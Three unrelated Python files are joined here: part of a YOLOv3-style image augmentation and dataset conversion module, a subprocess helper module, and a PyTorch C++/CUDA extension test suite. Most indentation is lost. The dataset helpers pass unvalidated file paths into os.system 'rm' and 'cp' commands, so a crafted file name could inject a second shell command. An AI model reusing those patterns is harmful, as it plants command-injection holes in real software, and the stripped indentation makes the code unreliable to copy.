# Replicate
# img4, labels4 = replicate(img4, labels4)
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_affine(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
border=self.mosaic_border) # border to remove
return img4, labels4
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
    # Resize and pad image to new_shape, rounding the padding to a 64-pixel multiple when auto=True https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = new_shape
ratio = new_shape[0] / shape[1], new_shape[1] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
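# Worked example for letterbox (illustrative frame size): a 720x1280 (h x w)
# frame with new_shape=640 and auto=True gives r = min(640/720, 640/1280) = 0.5,
# an unpadded size of 640x360, and dh = np.mod(640 - 360, 64) / 2 = 12 px of
# grey padding on the top and bottom, for a final 384x640 image.
def _demo_letterbox():
    frame = np.full((720, 1280, 3), 114, dtype=np.uint8)  # dummy BGR frame
    img, ratio, (dw, dh) = letterbox(frame, new_shape=640)
    return img.shape, ratio, (dw, dh)  # ((384, 640, 3), (0.5, 0.5), (0.0, 12.0))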
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(-translate, translate) * img.shape[1] + border[1] # x translation (pixels)
T[1, 2] = random.uniform(-translate, translate) * img.shape[0] + border[0] # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Combined rotation matrix
M = S @ T @ R # ORDER IS IMPORTANT HERE!!
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
img = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_LINEAR, borderValue=(114, 114, 114))
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# reject warped points outside of image
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
w = xy[:, 2] - xy[:, 0]
h = xy[:, 3] - xy[:, 1]
area = w * h
area0 = (targets[:, 3] - targets[:, 1]) * (targets[:, 4] - targets[:, 2])
ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16)) # aspect ratio
i = (w > 2) & (h > 2) & (area / (area0 * s + 1e-16) > 0.2) & (ar < 20)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def cutout(image, labels):
# https://arxiv.org/abs/1708.04552
# https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
# https://towardsdatascience.com/when-conventional-wisdom-fails-revisiting-data-augmentation-for-self-driving-cars-4831998c5509
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(path='../data/sm4/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def convert_images2bmp(): # from utils.datasets import *; convert_images2bmp()
# Save images
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
# for path in ['../coco/images/val2014', '../coco/images/train2014']:
for path in ['../data/sm4/images', '../data/sm4/background']:
create_folder(path + 'bmp')
for ext in formats: # ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
for f in tqdm(glob.glob('%s/*%s' % (path, ext)), desc='Converting %s' % ext):
cv2.imwrite(f.replace(ext.lower(), '.bmp').replace(path, path + 'bmp'), cv2.imread(f))
# Save labels
# for path in ['../coco/trainvalno5k.txt', '../coco/5k.txt']:
for file in ['../data/sm4/out_train.txt', '../data/sm4/out_test.txt']:
with open(file, 'r') as f:
lines = f.read()
# lines = f.read().replace('2014/', '2014bmp/') # coco
lines = lines.replace('/images', '/imagesbmp')
lines = lines.replace('/background', '/backgroundbmp')
for ext in formats:
lines = lines.replace(ext, '.bmp')
with open(file.replace('.txt', 'bmp.txt'), 'w') as f:
f.write(lines)
def recursive_dataset2bmp(dataset='../data/sm4_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='data/coco_64img.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new_folder'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
shell.py
|
import os
import queue
import shlex
import select
import threading as mt
import subprocess as sp
from .constants import RUNNING, DONE, FAILED
from .misc import is_string
# ------------------------------------------------------------------------------
#
def sh_callout(cmd, stdout=True, stderr=True, shell=False, env=None):
'''
call a shell command, return `[stdout, stderr, retval]`.
'''
# convert string into arg list if needed
if is_string(cmd) and \
not shell: cmd = shlex.split(cmd)
if stdout : stdout = sp.PIPE
else : stdout = None
if stderr : stderr = sp.PIPE
else : stderr = None
    p = sp.Popen(cmd, stdout=stdout, stderr=stderr, shell=shell, env=env)
    if not stdout and not stderr:
        # nothing is captured - just wait for the child to finish
        ret = p.wait()
        return '', '', ret
    out, err = p.communicate()
    ret = p.returncode
    # communicate() returns None for any stream that was not piped
    out = out.decode("utf-8") if out is not None else ''
    err = err.decode("utf-8") if err is not None else ''
    return out, err, ret
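# Usage sketch (illustrative command, not part of the original module): run a
# trivial command and inspect its captured output and exit code.
def _demo_sh_callout():
    out, err, ret = sh_callout('echo hello')
    return out.strip(), err, ret  # ('hello', '', 0)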
# ------------------------------------------------------------------------------
#
def sh_callout_bg(cmd, stdout=None, stderr=None, shell=False, env=None):
'''
    Call a shell command in the background.  Piping STDOUT/ERR is not
    supported; output can only be redirected to named files.
'''
# pipes won't work - see sh_callout_async
if stdout == sp.PIPE: raise ValueError('stdout pipe unsupported')
if stderr == sp.PIPE: raise ValueError('stderr pipe unsupported')
    # open file descriptors for I/O, if needed
if is_string(stdout): stdout = open(stdout, 'w')
if is_string(stderr): stderr = open(stderr, 'w')
# convert string into arg list if needed
if not shell and is_string(cmd): cmd = shlex.split(cmd)
sp.Popen(cmd, stdout=stdout, stderr=stderr, shell=shell, env=env)
return
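# Usage sketch (illustrative file names): run a command in the background and
# redirect its output to named files, since pipes are not supported here.
def _demo_sh_callout_bg():
    sh_callout_bg('sleep 1', stdout='/tmp/demo.out', stderr='/tmp/demo.err')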
# ------------------------------------------------------------------------------
#
def sh_callout_async(cmd, stdin=True, stdout=True, stderr=True,
shell=False, env=None):
'''
    Run a command and capture stdout/stderr if so flagged.  The call returns
    a PROC object instance on which the captured output can be retrieved
    line by line (I/O is line buffered).  When the process is done, a `None`
    is put onto the I/O queues to signal EOF.
Line breaks are stripped.
stdout/stderr: True [default], False, string
- False : discard I/O
- True : capture I/O as queue [default]
- string: capture I/O as queue, also write to named file
shell: True, False [default]
- pass to popen
PROC:
- PROC.stdout : `queue.Queue` instance delivering stdout lines
- PROC.stderr : `queue.Queue` instance delivering stderr lines
- PROC.state : ru.RUNNING, ru.DONE, ru.FAILED
- PROC.rc : returncode (None while ru.RUNNING)
- PROC.stdout_filename: name of stdout file (when available)
- PROC.stderr_filename: name of stderr file (when available)
'''
    # NOTE: Python's stdio buffering misbehaves when threads are used, *even
    #       if the threads do not perform stdio themselves*.  It is possible
    #       that the logging module interferes, too.  Debugging this proved
    #       fruitless, so this method cannot be used from threaded python
    #       applications.
assert(False), 'this is broken for python apps'
# --------------------------------------------------------------------------
#
class _P(object):
'''
internal representation of a process
'''
# ----------------------------------------------------------------------
def __init__(self, cmd, stdin, stdout, stderr, shell, env):
cmd = cmd.strip()
self._in_c = bool(stdin) # flag stdin capture
self._out_c = bool(stdout) # flag stdout capture
self._err_c = bool(stderr) # flag stderr capture
self._in_r , self._in_w = os.pipe() # put stdin to child
self._out_r, self._out_w = os.pipe() # get stdout from child
self._err_r, self._err_w = os.pipe() # get stderr from child
self._in_o = os.fdopen(self._in_r) # file object for in ep
self._out_o = os.fdopen(self._out_r) # file object for out ep
self._err_o = os.fdopen(self._err_r) # file object for err ep
self._in_q = queue.Queue() # get stdin from parent
self._out_q = queue.Queue() # put stdout to parent
self._err_q = queue.Queue() # put stderr to parent
if is_string(stdout): self._out_f = open(stdout, 'w')
else : self._out_f = None
if is_string(stderr): self._err_f = open(stderr, 'w')
else : self._err_f = None
self.state = RUNNING
self._proc = sp.Popen(cmd, stdin=self._in_r,
stdout=self._out_w,
stderr=self._err_w,
shell=shell,
env=env,
bufsize=1)
t = mt.Thread(target=self._watch)
t.daemon = True
t.start()
self.rc = None # return code
@property
def stdin(self):
if not self._in_c:
raise RuntimeError('stdin not captured')
return self._in_q
@property
def stdout(self):
if not self._out_c:
raise RuntimeError('stdout not captured')
return self._out_q
@property
def stderr(self):
if not self._err_c:
raise RuntimeError('stderr not captured')
return self._err_q
@property
def stdout_filename(self):
if not self._out_f:
raise RuntimeError('stdout not recorded')
return self._out_f.name
@property
def stderr_filename(self):
if not self._err_f:
raise RuntimeError('stderr not recorded')
return self._err_f.name
def kill(self):
self._proc.terminate()
# ----------------------------------------------------------------------
#
def _watch(self):
poller = select.poll()
poller.register(self._out_r, select.POLLIN | select.POLLHUP)
poller.register(self._err_r, select.POLLIN | select.POLLHUP)
# try forever to read stdin, stdout and stderr, stop only when
# either signals that process (parent or child) died
while True:
                # check for input from the parent and forward it to the
                # child's stdin pipe
                try:
                    data = self._in_q.get_nowait()
                except queue.Empty:
                    data = None
                if data:
                    os.write(self._in_w, data.encode('utf-8'))
active = False
fds = poller.poll(100) # timeout configurable (ms)
for fd,mode in fds:
if mode & select.POLLHUP:
# fd died - grab data from other fds
continue
if fd == self._out_r:
o_in = self._out_o
q_out = self._out_q
f_out = self._out_f
elif fd == self._err_r:
o_in = self._err_o
q_out = self._err_q
f_out = self._err_f
line = o_in.readline() # `bufsize=1` in `popen`
if line:
# found valid data (active)
active = True
if q_out: q_out.put(line.rstrip('\n'))
if f_out: f_out.write(line)
# no data received - check process health
if not active and self._proc.poll() is not None:
# process is dead
self.rc = self._proc.returncode
if self.rc == 0: self.state = DONE
else : self.state = FAILED
if self._out_q: self._out_q.put(None) # signal EOF
if self._err_q: self._err_q.put(None) # signal EOF
if self._out_q: self._out_q.join() # ensure reads
if self._err_q: self._err_q.join() # ensure reads
return # finishes thread
# --------------------------------------------------------------------------
return _P(cmd=cmd, stdin=stdin, stdout=stdout, stderr=stderr,
shell=shell, env=env)
# ------------------------------------------------------------------------------
|
test_cpp_extensions_jit.py
|
import os
import shutil
import sys
import unittest
import warnings
import re
import tempfile
import subprocess
import glob
import textwrap
from multiprocessing import Process
import torch.testing._internal.common_utils as common
import torch
import torch.backends.cudnn
import torch.utils.cpp_extension
from torch.utils.cpp_extension import CUDA_HOME, ROCM_HOME
from torch.testing._internal.common_utils import gradcheck, TEST_WITH_ASAN, has_breakpad
TEST_CUDA = torch.cuda.is_available() and CUDA_HOME is not None
TEST_CUDNN = False
TEST_ROCM = torch.cuda.is_available() and torch.version.hip is not None and ROCM_HOME is not None
if TEST_CUDA and torch.version.cuda is not None:  # skip the cuDNN test for ROCm
CUDNN_HEADER_EXISTS = os.path.isfile(os.path.join(CUDA_HOME, "include/cudnn.h"))
TEST_CUDNN = (
TEST_CUDA and CUDNN_HEADER_EXISTS and torch.backends.cudnn.is_available()
)
IS_WINDOWS = sys.platform == "win32"
def remove_build_path():
if sys.platform == "win32":
print("Not wiping extensions build folder because Windows")
return
default_build_root = torch.utils.cpp_extension.get_default_build_root()
if os.path.exists(default_build_root):
shutil.rmtree(default_build_root)
class TestCppExtensionJIT(common.TestCase):
"""Tests just-in-time cpp extensions.
Don't confuse this with the PyTorch JIT (aka TorchScript).
"""
def setUp(self):
super().setUp()
# cpp extensions use relative paths. Those paths are relative to
# this file, so we'll change the working directory temporarily
self.old_working_dir = os.getcwd()
os.chdir(os.path.dirname(os.path.abspath(__file__)))
def tearDown(self):
super().tearDown()
# return the working directory (see setUp)
os.chdir(self.old_working_dir)
@classmethod
def setUpClass(cls):
remove_build_path()
@classmethod
def tearDownClass(cls):
remove_build_path()
def test_jit_compile_extension(self):
module = torch.utils.cpp_extension.load(
name="jit_extension",
sources=[
"cpp_extensions/jit_extension.cpp",
"cpp_extensions/jit_extension2.cpp",
],
extra_include_paths=["cpp_extensions"],
extra_cflags=["-g"],
verbose=True,
)
x = torch.randn(4, 4)
y = torch.randn(4, 4)
z = module.tanh_add(x, y)
self.assertEqual(z, x.tanh() + y.tanh())
        # Check that we can call a method that is not defined in the main C++ file.
z = module.exp_add(x, y)
self.assertEqual(z, x.exp() + y.exp())
# Checking we can use this JIT-compiled class.
doubler = module.Doubler(2, 2)
self.assertIsNone(doubler.get().grad)
self.assertEqual(doubler.get().sum(), 4)
self.assertEqual(doubler.forward().sum(), 8)
@unittest.skipIf(not (TEST_CUDA or TEST_ROCM), "CUDA not found")
def test_jit_cuda_extension(self):
# NOTE: The name of the extension must equal the name of the module.
module = torch.utils.cpp_extension.load(
name="torch_test_cuda_extension",
sources=[
"cpp_extensions/cuda_extension.cpp",
"cpp_extensions/cuda_extension.cu",
],
extra_cuda_cflags=["-O2"],
verbose=True,
keep_intermediates=False,
)
x = torch.zeros(100, device="cuda", dtype=torch.float32)
y = torch.zeros(100, device="cuda", dtype=torch.float32)
z = module.sigmoid_add(x, y).cpu()
# 2 * sigmoid(0) = 2 * 0.5 = 1
self.assertEqual(z, torch.ones_like(z))
def _run_jit_cuda_archflags(self, flags, expected):
# Compile an extension with given `flags`
def _check_cuobjdump_output(expected_values, is_ptx=False):
elf_or_ptx = '--list-ptx' if is_ptx else '--list-elf'
lib_ext = '.pyd' if IS_WINDOWS else '.so'
            # Note: the extension file name may include _v1, _v2, so find the exact name first
ext_filename = glob.glob(os.path.join(temp_dir,
'cudaext_archflag*' + lib_ext))[0]
command = ['cuobjdump', elf_or_ptx, ext_filename]
p = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output, err = p.communicate()
output = output.decode("ascii")
err = err.decode("ascii")
            if p.returncode != 0 or err != '':
raise AssertionError("Flags: {}\nReturncode: {}\nStderr: {}\n"
"Output: {} ".format(flags, p.returncode,
err, output))
actual_arches = sorted(re.findall(r'sm_\d\d', output))
expected_arches = sorted(['sm_' + xx for xx in expected_values])
self.assertEqual(actual_arches, expected_arches,
msg="Flags: {}, Actual: {}, Expected: {}\n"
"Stderr: {}\nOutput: {}".format(
flags, actual_arches, expected_arches,
err, output))
temp_dir = tempfile.mkdtemp()
old_envvar = os.environ.get('TORCH_CUDA_ARCH_LIST', None)
try:
os.environ['TORCH_CUDA_ARCH_LIST'] = flags
torch.utils.cpp_extension.load(
name="cudaext_archflags",
sources=[
"cpp_extensions/cuda_extension.cpp",
"cpp_extensions/cuda_extension.cu",
],
extra_cuda_cflags=["-O2"],
verbose=True,
build_directory=temp_dir,
)
# Expected output for --list-elf:
# ELF file 1: cudaext_archflags.1.sm_61.cubin
# ELF file 2: cudaext_archflags.2.sm_52.cubin
_check_cuobjdump_output(expected[0])
if expected[1] is not None:
# Expected output for --list-ptx:
# PTX file 1: cudaext_archflags.1.sm_61.ptx
_check_cuobjdump_output(expected[1], is_ptx=True)
finally:
if IS_WINDOWS:
print("Not wiping extensions build folder because Windows")
else:
shutil.rmtree(temp_dir)
if old_envvar is None:
os.environ.pop('TORCH_CUDA_ARCH_LIST')
else:
os.environ['TORCH_CUDA_ARCH_LIST'] = old_envvar
@unittest.skipIf(not TEST_CUDA, "CUDA not found")
@unittest.skipIf(TEST_ROCM, "disabled on rocm")
def test_jit_cuda_archflags(self):
# Test a number of combinations:
# - the default for the machine we're testing on
# - Separators, can be ';' (most common) or ' '
# - Architecture names
# - With/without '+PTX'
n = torch.cuda.device_count()
capabilities = {torch.cuda.get_device_capability(i) for i in range(n)}
# expected values is length-2 tuple: (list of ELF, list of PTX)
# note: there should not be more than one PTX value
archflags = {
'': (['{}{}'.format(capability[0], capability[1]) for capability in capabilities], None),
"Maxwell+Tegra;6.1": (['53', '61'], None),
"Pascal 3.5": (['35', '60', '61'], None),
"Volta": (['70'], ['70']),
}
if int(torch.version.cuda.split('.')[0]) >= 10:
# CUDA 9 only supports compute capability <= 7.2
archflags["7.5+PTX"] = (['75'], ['75'])
archflags["5.0;6.0+PTX;7.0;7.5"] = (['50', '60', '70', '75'], ['60'])
for flags, expected in archflags.items():
self._run_jit_cuda_archflags(flags, expected)
@unittest.skipIf(not TEST_CUDNN, "CuDNN not found")
def test_jit_cudnn_extension(self):
# implementation of CuDNN ReLU
if IS_WINDOWS:
extra_ldflags = ["cudnn.lib"]
else:
extra_ldflags = ["-lcudnn"]
module = torch.utils.cpp_extension.load(
name="torch_test_cudnn_extension",
sources=["cpp_extensions/cudnn_extension.cpp"],
extra_ldflags=extra_ldflags,
verbose=True,
with_cuda=True,
)
x = torch.randn(100, device="cuda", dtype=torch.float32)
y = torch.zeros(100, device="cuda", dtype=torch.float32)
module.cudnn_relu(x, y) # y=relu(x)
self.assertEqual(torch.nn.functional.relu(x), y)
with self.assertRaisesRegex(RuntimeError, "same size"):
y_incorrect = torch.zeros(20, device="cuda", dtype=torch.float32)
module.cudnn_relu(x, y_incorrect)
def test_inline_jit_compile_extension_with_functions_as_list(self):
cpp_source = """
torch::Tensor tanh_add(torch::Tensor x, torch::Tensor y) {
return x.tanh() + y.tanh();
}
"""
module = torch.utils.cpp_extension.load_inline(
name="inline_jit_extension_with_functions_list",
cpp_sources=cpp_source,
functions="tanh_add",
verbose=True,
)
self.assertEqual(module.tanh_add.__doc__.split("\n")[2], "tanh_add")
x = torch.randn(4, 4)
y = torch.randn(4, 4)
z = module.tanh_add(x, y)
self.assertEqual(z, x.tanh() + y.tanh())
def test_inline_jit_compile_extension_with_functions_as_dict(self):
cpp_source = """
torch::Tensor tanh_add(torch::Tensor x, torch::Tensor y) {
return x.tanh() + y.tanh();
}
"""
module = torch.utils.cpp_extension.load_inline(
name="inline_jit_extension_with_functions_dict",
cpp_sources=cpp_source,
functions={"tanh_add": "Tanh and then sum :D"},
verbose=True,
)
self.assertEqual(module.tanh_add.__doc__.split("\n")[2], "Tanh and then sum :D")
def test_inline_jit_compile_extension_multiple_sources_and_no_functions(self):
cpp_source1 = """
torch::Tensor sin_add(torch::Tensor x, torch::Tensor y) {
return x.sin() + y.sin();
}
"""
cpp_source2 = """
#include <torch/extension.h>
torch::Tensor sin_add(torch::Tensor x, torch::Tensor y);
PYBIND11_MODULE(TORCH_EXTENSION_NAME, m) {
m.def("sin_add", &sin_add, "sin(x) + sin(y)");
}
"""
module = torch.utils.cpp_extension.load_inline(
name="inline_jit_extension",
cpp_sources=[cpp_source1, cpp_source2],
verbose=True,
)
x = torch.randn(4, 4)
y = torch.randn(4, 4)
z = module.sin_add(x, y)
self.assertEqual(z, x.sin() + y.sin())
@unittest.skip("Temporarily disabled")
@unittest.skipIf(not (TEST_CUDA or TEST_ROCM), "CUDA not found")
def test_inline_jit_compile_extension_cuda(self):
cuda_source = """
__global__ void cos_add_kernel(
const float* __restrict__ x,
const float* __restrict__ y,
float* __restrict__ output,
const int size) {
const auto index = blockIdx.x * blockDim.x + threadIdx.x;
if (index < size) {
output[index] = __cosf(x[index]) + __cosf(y[index]);
}
}
torch::Tensor cos_add(torch::Tensor x, torch::Tensor y) {
auto output = torch::zeros_like(x);
const int threads = 1024;
const int blocks = (output.numel() + threads - 1) / threads;
cos_add_kernel<<<blocks, threads>>>(x.data<float>(), y.data<float>(), output.data<float>(), output.numel());
return output;
}
"""
# Here, the C++ source need only declare the function signature.
cpp_source = "torch::Tensor cos_add(torch::Tensor x, torch::Tensor y);"
module = torch.utils.cpp_extension.load_inline(
name="inline_jit_extension_cuda",
cpp_sources=cpp_source,
cuda_sources=cuda_source,
functions=["cos_add"],
verbose=True,
)
self.assertEqual(module.cos_add.__doc__.split("\n")[2], "cos_add")
x = torch.randn(4, 4, device="cuda", dtype=torch.float32)
y = torch.randn(4, 4, device="cuda", dtype=torch.float32)
z = module.cos_add(x, y)
self.assertEqual(z, x.cos() + y.cos())
@unittest.skip("Temporarily disabled")
@unittest.skipIf(not (TEST_CUDA or TEST_ROCM), "CUDA not found")
def test_inline_jit_compile_custom_op_cuda(self):
cuda_source = """
__global__ void cos_add_kernel(
const float* __restrict__ x,
const float* __restrict__ y,
float* __restrict__ output,
const int size) {
const auto index = blockIdx.x * blockDim.x + threadIdx.x;
if (index < size) {
output[index] = __cosf(x[index]) + __cosf(y[index]);
}
}
torch::Tensor cos_add(torch::Tensor x, torch::Tensor y) {
auto output = torch::zeros_like(x);
const int threads = 1024;
const int blocks = (output.numel() + threads - 1) / threads;
cos_add_kernel<<<blocks, threads>>>(x.data_ptr<float>(), y.data_ptr<float>(), output.data_ptr<float>(), output.numel());
return output;
}
"""
# Here, the C++ source need only declare the function signature.
cpp_source = """
#include <torch/library.h>
torch::Tensor cos_add(torch::Tensor x, torch::Tensor y);
TORCH_LIBRARY(inline_jit_extension_custom_op_cuda, m) {
m.def("cos_add", cos_add);
}
"""
torch.utils.cpp_extension.load_inline(
name="inline_jit_extension_custom_op_cuda",
cpp_sources=cpp_source,
cuda_sources=cuda_source,
verbose=True,
is_python_module=False,
)
x = torch.randn(4, 4, device="cuda", dtype=torch.float32)
y = torch.randn(4, 4, device="cuda", dtype=torch.float32)
z = torch.ops.inline_jit_extension_custom_op_cuda.cos_add(x, y)
self.assertEqual(z, x.cos() + y.cos())
def test_inline_jit_compile_extension_throws_when_functions_is_bad(self):
with self.assertRaises(ValueError):
torch.utils.cpp_extension.load_inline(
name="invalid_jit_extension", cpp_sources="", functions=5
)
def test_lenient_flag_handling_in_jit_extensions(self):
cpp_source = """
torch::Tensor tanh_add(torch::Tensor x, torch::Tensor y) {
return x.tanh() + y.tanh();
}
"""
module = torch.utils.cpp_extension.load_inline(
name="lenient_flag_handling_extension",
cpp_sources=cpp_source,
functions="tanh_add",
extra_cflags=["-g\n\n", "-O0 -Wall"],
extra_include_paths=[" cpp_extensions\n"],
verbose=True,
)
x = torch.zeros(100, dtype=torch.float32)
y = torch.zeros(100, dtype=torch.float32)
z = module.tanh_add(x, y).cpu()
self.assertEqual(z, x.tanh() + y.tanh())
@unittest.skip("Temporarily disabled")
@unittest.skipIf(not (TEST_CUDA or TEST_ROCM), "CUDA not found")
def test_half_support(self):
"""
Checks for an issue with operator< ambiguity for half when certain
THC headers are included.
See https://github.com/pytorch/pytorch/pull/10301#issuecomment-416773333
for the corresponding issue.
"""
cuda_source = """
#include <THC/THCNumerics.cuh>
template<typename T, typename U>
__global__ void half_test_kernel(const T* input, U* output) {
if (input[0] < input[1] || input[0] >= input[1]) {
output[0] = 123;
}
}
torch::Tensor half_test(torch::Tensor input) {
auto output = torch::empty(1, input.options().dtype(torch::kFloat));
AT_DISPATCH_FLOATING_TYPES_AND_HALF(input.scalar_type(), "half_test", [&] {
half_test_kernel<scalar_t><<<1, 1>>>(
input.data<scalar_t>(),
output.data<float>());
});
return output;
}
"""
module = torch.utils.cpp_extension.load_inline(
name="half_test_extension",
cpp_sources="torch::Tensor half_test(torch::Tensor input);",
cuda_sources=cuda_source,
functions=["half_test"],
verbose=True,
)
x = torch.randn(3, device="cuda", dtype=torch.half)
result = module.half_test(x)
self.assertEqual(result[0], 123)
def test_reload_jit_extension(self):
def compile(code):
return torch.utils.cpp_extension.load_inline(
name="reloaded_jit_extension",
cpp_sources=code,
functions="f",
verbose=True,
)
module = compile("int f() { return 123; }")
self.assertEqual(module.f(), 123)
module = compile("int f() { return 456; }")
self.assertEqual(module.f(), 456)
module = compile("int f() { return 456; }")
self.assertEqual(module.f(), 456)
module = compile("int f() { return 789; }")
self.assertEqual(module.f(), 789)
def test_cpp_frontend_module_has_same_output_as_python(self, dtype=torch.double):
extension = torch.utils.cpp_extension.load(
name="cpp_frontend_extension",
sources="cpp_extensions/cpp_frontend_extension.cpp",
verbose=True,
)
